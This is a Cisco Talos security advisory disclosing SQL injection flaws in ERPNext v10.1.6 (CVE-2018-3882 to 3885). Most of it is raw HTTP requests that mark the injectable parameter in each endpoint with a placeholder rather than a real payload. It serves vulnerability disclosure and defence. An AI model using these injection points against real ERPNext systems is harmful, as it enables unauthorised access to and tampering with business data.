Headline
CVE-2018-3882: TALOS-2018-0560 || Cisco Talos Intelligence Group
An exploitable SQL injection vulnerability exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. The searchfield parameter can be used to perform an SQL injection attack. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Summary
Exploitable SQL injection vulnerabilities exists in the authenticated part of ERPNext v10.1.6. Specially crafted web requests can cause SQL injections resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Tested Versions
ERPNext v10.1.6 (master)
Product URLs
https://erpnext.com/
CVSSv3 Score
CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
CWE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
The following parameters are vulnerable to SQL injection attacks:
CVE-2018-3882 - searchfield parameter
The searchfield parameter can be used to perform an SQL injection attack as shown below:
GET /?txt=a&searchfield=name<SQLINJECTION>&query=erpnext.controllers.queries.employee_query&doctype=Employee&cmd=frappe.desk.search.search_widget&_=1522110063950 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close
CVE-2018-3883 - employee parameter
The employee parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 194
Cookie: user_image=; user_id=Administrator; system_user=yes; full_name=Administrator; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=-cQWmng9Wch23ijkAAAF
DNT: 1
Connection: close
employee=EMP%2f0001<SQLINJECTION>&date=2018-03-07&leave_type=Leave+Without+Pay&consider_all_leaves_in_the_allocation_period=true&cmd=erpnext.hr.doctype.leave_application.leave_application.get_leave_balance_on
CVE-2018-3883 - sort_order parameter
The sort_order parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0&sort_by=projected_qty&sort_order=asc<SQLINJECTION>&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3884 - sort_by parameter
The sort_by parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0&sort_by=projected_qty<SQLINJECTION>&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3884 - start parameter
The start parameter can be used to perform an SQL injection attack as shown below:
POST / HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Content-Length: 113
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
item_code=asdasd&start=0<SQLINJECTION>&sort_by=projected_qty&sort_order=asc&cmd=erpnext.stock.dashboard.item_dashboard.get_data
CVE-2018-3885 - order_by parameter
The order_by parameter can be used to perform an SQL injection attack as shown below:
GET /?start=0&page_length=20&doctype=Customer&fields=[%22%60tabCustomer%60.%60name%60%22%2c%22%60tabCustomer%60.%60owner%60%22%2c%22%60tabCustomer%60.%60docstatus%60%22%2c%22%60tabCustomer%60.%60_user_tags%60%22%2c%22%60tabCustomer%60.%60_comments%60%22%2c%22%60tabCustomer%60.%60modified%60%22%2c%22%60tabCustomer%60.%60modified_by%60%22%2c%22%60tabCustomer%60.%60_assign%60%22%2c%22%60tabCustomer%60.%60_liked_by%60%22%2c%22%60tabCustomer%60.%60_seen%60%22%2c%22%60tabCustomer%60.%60customer_name%60%22%2c%22%60tabCustomer%60.%60image%60%22%2c%22%60tabCustomer%60.%60disabled%60%22%2c%22%60tabCustomer%60.%60customer_group%60%22%2c%22%60tabCustomer%60.%60territory%60%22%2c%22%60tabCustomer%60.%60customer_type%60%22]&filters=%5B%5D&order_by=<SQLINJECTION>&with_comment_count=true&user_settings=%7B%22updated_on%22%3A%22Tue+Mar+27+2018+01%3A08%3A06+GMT%2B0100%22%2C%22List%22%3A%7B%22filters%22%3A%5B%5D%2C%22order_by%22%3A%22%60tabCustomer%60.%60modified%60+desc%22%7D%2C%22last_view%22%3A%22List%22%7D&cmd=frappe.desk.reportview.get&_=1522108874124 HTTP/1.1
Host: 192.168.239.140
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.140/desk
X-Frappe-CSRF-Token: 14ee26a793805ed02dbd172b28d514503da3d31fb5e9392930567947
X-Requested-With: XMLHttpRequest
Cookie: user_image=; user_id=admin%40admin.com; system_user=yes; full_name=asd; sid=dd26a9f121a4177ed22d8f5ff0a93508eb095cbf18cecaa020cccdd4; io=ELCOCSQzSPt1L6_fAAAE
DNT: 1
Connection: close
Timeline
2018-04-12 - Vendor Disclosure
2018-09-05 - Public Release